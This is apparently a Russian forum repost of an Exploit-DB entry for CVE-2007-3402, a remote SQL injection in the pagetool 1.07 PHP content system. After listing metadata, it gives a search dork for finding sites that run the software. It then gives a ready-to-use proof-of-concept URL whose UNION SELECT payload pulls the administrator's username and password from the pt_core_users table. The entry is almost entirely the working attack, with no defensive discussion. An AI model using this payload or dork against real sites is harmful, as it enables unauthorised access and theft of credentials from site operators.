- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4107
- Проверка EDB
-
- Пройдено
- Автор
- KATATAFISH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3402
- Дата публикации
- 2007-06-25
Код:
###pagetool-1.07 Remote SQL Injection###
#
#download:http://kent.dl.sourceforge.net/sourceforge/pagetool/pagetool-1.07.tar.gz
#
#Found by: Katatafish ([email protected])
#
#Dork: "powered by Pagetool"
#
#Thanks: str0ke
#
########################################
#PoC
http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1
# milw0rm.com [2007-06-25]
- Источник
- www.exploit-db.com